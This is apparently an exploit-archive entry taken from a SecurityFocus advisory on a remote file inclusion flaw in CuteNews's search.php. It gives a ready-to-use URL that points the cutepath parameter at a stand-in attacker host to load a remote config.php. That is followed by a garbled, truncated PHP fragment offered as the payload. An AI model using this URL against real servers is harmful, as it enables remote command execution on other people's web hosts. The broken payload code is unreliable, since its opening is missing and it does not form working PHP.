14 lines
No EOL
735 B
Text
14 lines
No EOL
735 B
Text
source: https://www.securityfocus.com/bid/6935/info
|
|
|
|
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
|
|
|
|
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
|
|
|
|
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.
|
|
|
|
http://www.example.com/cutenews/search.php?cutepath=http://<attacker_site>/config.php
|
|
|
|
----------------------------------config.php----------------------------------------
|
|
|
|
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
|
|
"; } } } ?> |